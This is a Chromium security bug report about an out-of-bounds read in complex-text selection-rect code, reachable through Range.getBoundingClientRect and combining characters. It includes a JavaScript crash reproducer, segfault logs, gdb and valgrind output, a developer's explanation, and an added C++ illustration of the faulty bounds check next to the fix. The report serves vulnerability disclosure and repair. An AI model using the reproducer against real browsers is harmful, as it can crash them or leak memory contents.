Starred by 2 users
Status: Fixed
Closed: Feb 2011
OS: Linux
Pri: 1
Type: Bug-Security
width of boundingClientRect for Range with unicode combining characters is corrupted
Reported by miau...@gmail.com, Jan 25 2011
VULNERABILITY DETAILS

width of boundingClientRect is corrupted with strange values; possibly segfaulting at high offset.

VERSION
Chrome Version: 
Ubuntu 
Google Chrome 8.0.552.237 
Linux 2.6.35-25-generic #44-Ubuntu SMP x86_64 GNU/Linux

Chromium 
10.0.648.0~svn20110124r72310-0ubuntu1~ucd2~maverick
Linux 2.6.35-25-generic #44-Ubuntu SMP x86_64 GNU/Linux

Chromium 10.0.650.0
on ubuntu 32 bit, 2.6.35-22
from http://build.chromium.org/f/chromium/snapshots/chromium-rel-linux/

not affected: windows7 32bit, chrome stable, windows xp 32bit, chrome stable

REPRODUCTION CASE

On 32 bits I've only gotten it to segfault a couple of times, but I consistently get weird values for length and width in the console, such as 0xFFFFFF00, 2^31, 2^32, -2^31, or any random number between 100 and 2^32.

with --single-process I don't get the combined unicode characters showing up, only blank boxes, and then I'm unable to reproduce.  gdb stuff is from running with
--renderer-cmd-prefix='xterm -e gdb --eval-command=run --args'

<span id="a">A&#x20d5;A&#xFE20;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<span id="b">e&#x0300;A&#x20da;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<span id="c">u&#x0336;A&#xFE20;A&#x20e3;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<span id="d">o&#x20f5;A&#xFE20;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<script>
  var gotOne = false;
  var range;
  // Build ranges of increasing length inside the span's text node and log
  // any bounding rect whose width is implausible (negative or over 100px).
  function uhoh(w) {
    for (var j = 1; j < 6; j++) {
      var test = document.getElementById(w).firstChild;
      range = document.createRange();
      range.setStart(test, 1);
      range.setEnd(test, j);
      var rect = range.getBoundingClientRect();
      if (rect.width > 100 || rect.width < 0) {
        gotOne = true;
        console.log("range end: " + j);
        console.log("left: " + rect.left);
        console.log("width: " + rect.width);
      }
    }
  }

  // Repeat the check by injecting script elements until a bad width is
  // observed (or the renderer crashes).
  var r = 5000;
  for (var i = 0; i < r; i++) {
    if (gotOne) {
      break;
    }
    var s = document.createElement("script");
    s.innerHTML = "uhoh('a');";
    s.innerHTML += "uhoh('b');";
    s.innerHTML += "uhoh('c');";
    s.innerHTML += "uhoh('d');";
    var body = document.getElementById("a").parentElement;
    body.appendChild(s);
  }
</script>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: sad tab
Crash State: 

from /var/log/kern.log:
Jan 25 18:41:41  kernel: [38107.799633] chromium-browse[32174]: segfault at 7fda3683c140 ip 00007fda32366bde sp 00007ffff6323a80 error 4 in chromium-browser[7fda30bf4000+3262000]
Jan 25 18:41:41  kernel: [38107.899078] chromium-browse[32177]: segfault at 7fda3683c140 ip 00007fda32366bde sp 00007ffff6323a80 error 4 in chromium-browser[7fda30bf4000+3262000]
Jan 25 18:41:42  kernel: [38107.998958] chromium-browse[32180]: segfault at 7fda3683c140 ip 00007fda32366bde sp 00007ffff6323a80 error 4 in chromium-browser[7fda30bf4000+3262000]
Jan 25 18:45:36  kernel: [38341.893436] chromium-browse[32454]: segfault at 7f899c61cc80 ip 00007f8998eb2c42 sp 00007fff6a9ffff0 error 4 in chromium-browser[7f8997740000+3262000]
Jan 25 18:45:39  kernel: [38344.396394] chromium-browse[32458]: segfault at 7f899c62bc80 ip 00007f8998eb2c42 sp 00007fff6a9ffff0 error 4 in chromium-browser[7f8997740000+3262000]
Jan 25 18:46:06  kernel: [38372.107255] chromium-browse[32489]: segfault at 7f899c61cc80 ip 00007f8998eb2c42 sp 00007fff6a9ffff0 error 4 in chromium-browser[7f8997740000+3262000]
Jan 25 18:46:10  kernel: [38375.334760] chrome[32523]: segfault at 5758780 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]
Jan 25 18:46:16  kernel: [38381.688865] chrome[32542]: segfault at 5a2c5a0 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]
Jan 25 18:46:17  kernel: [38382.550059] chrome[32546]: segfault at 5679000 ip 00000000019913de sp 00007fff48729760 error 4 in chrome[400000+3126000]
Jan 25 18:46:17  kernel: [38383.090843] chrome[32549]: segfault at 5679000 ip 00000000019913de sp 00007fff48729760 error 4 in chrome[400000+3126000]
Jan 25 18:46:18  kernel: [38383.659383] chrome[32552]: segfault at 5777780 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]
Jan 25 18:46:19  kernel: [38384.223206] chrome[32555]: segfault at 5777780 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]

gdb:

Program received signal SIGSEGV, Segmentation fault.
0x00000000019913de in WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const ()
0x19913de <WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const+382>

(gdb) i r
rax            0xfe20   65056
rbx            0x1      1
rcx            0x400    1024
rdx            0x4106b40        68184896
rsi            0x3b57750        62224208
rdi            0x7fffffff95d0   140737488328144
rbp            0x0      0x0
rsp            0x7fffffff95a0   0x7fffffff95a0
r8             0x37a9378        58364792
r9             0x1da    474
r10            0xffffff00       4294967040
r11            0x0      0
r12            0xffffffff       4294967295
r13            0x5      5
r14            0x7fffffff95d0   140737488328144
r15            0x7fffffff9a50   140737488329296
rip            0x19913de
eflags         0x10216  [ PF AF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

(gdb) disas
Dump of assembler code for function _ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii:
   0x0000000001991385 <+293>:   retq   
   0x0000000001991386 <+294>:   jmp    0x1991390 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+304>
   0x0000000001991388 <+296>:   nop
   0x0000000001991389 <+297>:   nop
   0x000000000199138a <+298>:   nop
   0x000000000199138b <+299>:   nop
   0x000000000199138c <+300>:   nop
   0x000000000199138d <+301>:   nop
   0x000000000199138e <+302>:   nop
   0x000000000199138f <+303>:   nop
   0x0000000001991390 <+304>:   cmp    $0xffffffffffffffff,%ebp
   0x0000000001991393 <+307>:   jne    0x19912fb <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+155>
   0x0000000001991399 <+313>:   mov    0xc8(%rsp),%ebp
   0x00000000019913a0 <+320>:   jmpq   0x19912fb <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+155>
   0x00000000019913a5 <+325>:   jmp    0x19913a8 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+328>
   0x00000000019913a7 <+327>:   nop
   0x00000000019913a8 <+328>:   test   %ebx,%ebx
   0x00000000019913aa <+330>:   js     0x19913b0 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+336>
   0x00000000019913ac <+332>:   test   %al,%al
   0x00000000019913ae <+334>:   jne    0x1991420 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+448>
   0x00000000019913b0 <+336>:   mov    0xd0(%rsp),%eax
   0x00000000019913b7 <+343>:   sub    %eax,%ebx
   0x00000000019913b9 <+345>:   test   %r13d,%r13d
   0x00000000019913bc <+348>:   js     0x1991410 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+432>
   0x00000000019913be <+350>:   test   %dl,%dl
   0x00000000019913c0 <+352>:   je     0x1991410 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+432>
   0x00000000019913c2 <+354>:   cmp    %r13d,%eax
   0x00000000019913c5 <+357>:   jbe    0x1991410 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+432>
   0x00000000019913c7 <+359>:   mov    0xa0(%rsp),%rax
   0x00000000019913cf <+367>:   movslq %r13d,%rdx
   0x00000000019913d2 <+370>:   movzwl (%rax,%rdx,2),%eax
   0x00000000019913d6 <+374>:   mov    0xb8(%rsp),%rdx
=> 0x00000000019913de <+382>:   movss  (%rdx,%rax,4),%xmm0
   0x00000000019913e3 <+387>:   mov    0xe8(%rsp),%rdx
   0x00000000019913eb <+395>:   cvttss2si %xmm0,%r12d
   0x00000000019913f0 <+400>:   cmpb   $0x0,0x19(%rdx)
   0x00000000019913f4 <+404>:   je     0x19912d0 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+112>
   0x00000000019913fa <+410>:   mov    0x90(%rsp),%rdx
   0x0000000001991402 <+418>:   mov    (%rdx,%rax,4),%eax
   0x0000000001991405 <+421>:   sar    $0x6,%eax

(gdb) bt
#0  0x00000000019913de in WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const ()
#1  0x0000000001914386 in WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const ()
#2  0x0000000001c6fb97 in WebCore::InlineTextBox::selectionRect(int, int, int, int) ()
#3  0x0000000001d157b6 in WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) ()
#4  0x0000000001ac669b in WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const ()
#5  0x0000000001ac6a2c in WebCore::Range::getBoundingClientRect() const ()
#6  0x00000000017bbc0e in WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) ()
#7  0x00007fffc80a879c in ?? ()
#8  0x00007fffffff9df0 in ?? ()
#9  0x00007fffffff9df0 in ?? ()
#10 0x0000000000000000 in ?? ()

valgrind for chromium:

==979== Use of uninitialised value of size 8
==979==    at 0x1991442: WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1914385: WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1C6FB96: WebCore::InlineTextBox::selectionRect(int, int, int, int) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1D157B5: WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC669A: WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC6A2B: WebCore::Range::getBoundingClientRect() const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x17BBC0D: WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1095669: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>) (in /home/user/chromium/src/out/Release/chrome)
==979== 
==979== Invalid read of size 4
==979==    at 0x1991442: WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1914385: WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1C6FB96: WebCore::InlineTextBox::selectionRect(int, int, int, int) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1D157B5: WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC669A: WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC6A2B: WebCore::Range::getBoundingClientRect() const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x17BBC0D: WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1095669: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>) (in /home/user/chromium/src/out/Release/chrome)
==979==  Address 0x357069c4 is not stack'd, malloc'd or (recently) free'd
==979== 
==979== Process terminating with default action of signal 11 (SIGSEGV)
==979==  Access not within mapped region at address 0x35A0A244
==979==    at 0x1991442: WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1914385: WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1C6FB96: WebCore::InlineTextBox::selectionRect(int, int, int, int) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1D157B5: WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC669A: WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC6A2B: WebCore::Range::getBoundingClientRect() const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x17BBC0D: WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1095669: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>) (in /home/user/chromium/src/out/Release/chrome)


Attachment: 5.html (1.2 KB)
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit WebKit-Core OS-Linux Mstone-9
Status: Untriaged
Summary: width of boundingClientRect for Range with unicode combining characters is corrupted (was: NULL)
This is not reproducible on Windows.

Renderer crashes on Linux. Crash can be seen on Chrome9.0 as well.

Full report @ http://crash/reportdetail?reportid=0c0c912607c2f617

Comment 3 by evan@chromium.org, Jan 26 2011
Status: Assigned
Thanks for the quick patch Evan! Looking at the patch, the actual fault for what's going wrong isn't clear. Is it an out-of-bounds read? Out-of-bounds write? Use of out-of-bounds object vtable...?
Comment 6 by evan@chromium.org, Jan 27 2011
Example:

WebKit gives us a string: [ABCdefg] and then asks us "what pixel offset is the 4th character ('e') at?"

In complex-text land, we intend to break that string into smaller runs:
1) we shape ABC into characters and offset arrays.  we throw most of this away because we're looking for the 4th, but we keep the width of ABC to know where defg goes
2) we shape defg into characters and offsets.  4th char is within this, so we use the position of 'e' as computed.

Bug was:
In (1), when deciding whether 'e' is within the list of characters we've computed offsets for, we were testing whether it was within the length of the *entire* string (ABCdefg) so we'd index into our offset array (which was only computed for ABC) for the 4th element.

So it's an out-of-bounds read, I think.
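The bounds mistake described in the comment above, as an added C++ example that is not WebKit's code: a shaping stand-in with constructed glyph widths, the buggy check against the whole string's length beside the run-relative check. std::vector::at() stands in for the real out-of-bounds read so the bad index is reported instead of dereferenced; the run split, widths and function names are all assumptions.

```cpp
#include <cstddef>
#include <stdexcept>
#include <string>
#include <vector>

// Assumed model of the per-run shaping described in comment 6 (not WebKit's code).
struct Run { std::size_t start, length; };  // slice of the full string

// Stand-in for shaping: offsets[i] = x of the run's i-th char relative to the
// run start, offsets.back() = run width. Constructed widths: A-Z 10px, else 6px.
static std::vector<float> shapeRun(const std::string& text, const Run& run) {
    std::vector<float> offsets;
    float x = 0;
    for (std::size_t i = 0; i < run.length; ++i) {
        offsets.push_back(x);
        char c = text[run.start + i];
        x += (c >= 'A' && c <= 'Z') ? 10.0f : 6.0f;
    }
    offsets.push_back(x);
    return offsets;
}

// Buggy: the bound tested is the whole string's length and the index is absolute,
// so a target beyond the current run reads past the offsets computed for it.
// at() makes that out-of-bounds read throw instead of returning garbage.
float pixelOffsetBuggy(const std::string& text, const std::vector<Run>& runs, std::size_t target) {
    float runStart = 0;
    for (const Run& run : runs) {
        std::vector<float> offsets = shapeRun(text, run);
        if (target < text.size())
            return runStart + offsets.at(target);
        runStart += offsets.back();
    }
    return runStart;
}

// Fixed: index only when the target lies in this run, using a run-relative
// index; otherwise keep the run's width and continue with the next run.
float pixelOffsetFixed(const std::string& text, const std::vector<Run>& runs, std::size_t target) {
    float runStart = 0;
    for (const Run& run : runs) {
        std::vector<float> offsets = shapeRun(text, run);
        if (target >= run.start && target < run.start + run.length)
            return runStart + offsets[target - run.start];
        runStart += offsets.back();
    }
    return runStart;
}

const std::string kText = "ABCdefg";               // constructed input from the comment
const std::vector<Run> kRuns = {{0, 3}, {3, 4}};    // shaped as ABC, then defg
bool buggyReadsOutOfBounds(std::size_t target) {  // true when the buggy path reads past the run's offsets
    try { pixelOffsetBuggy(kText, kRuns, target); return false; }
    catch (const std::out_of_range&) { return true; }
}
```

With the 4th character ('e', index 4) the buggy path is still shaping ABC, whose offsets array has only four entries, so the absolute index lands past its end; the fixed path carries the 30px width of ABC forward and reads the run-relative entry for 'e'.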
Labels: SecSeverity-Medium
Status: WillMerge
Committed r76732: <http://trac.webkit.org/changeset/76732>

Seems simple enough to merge to m9, m10 -> WillMerge
Comment 9 by miau...@gmail.com, Feb 1 2011
the webkit bug is publicly visible. is that normal?
No. I flagged it as a security bug; thanks.
Labels: tomerge
Labels: -Mstone-9 -tomerge Mstone-10
Seems risky for M9, we'll merge to M10.
Comment 13 by evan@chromium.org, Feb 8 2011
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Status: FixUnreleased
merged to m10 in r78153. @chris thinks risky for m9, ignoring for m9.
Labels: CVE-2011-1192
Labels: Type-Security
Labels: SecImpacts-Stable
Batch update.
Labels: -Restrict-View-SecurityNotify
Lifting view restrictions.
Status: Fixed
Project Member Comment 20 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 21 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Area-WebKit -WebKit-Core -Mstone-10 -SecSeverity-Medium -Type-Security -SecImpacts-Stable Cr-Content Security-Impact-Stable Security-Severity-Medium Type-Bug-Security M-10 Cr-Content-Core
Project Member Comment 22 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 23 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 24 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member Comment 25 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Labels: reward-topanel
Project Member Comment 27 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 28 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic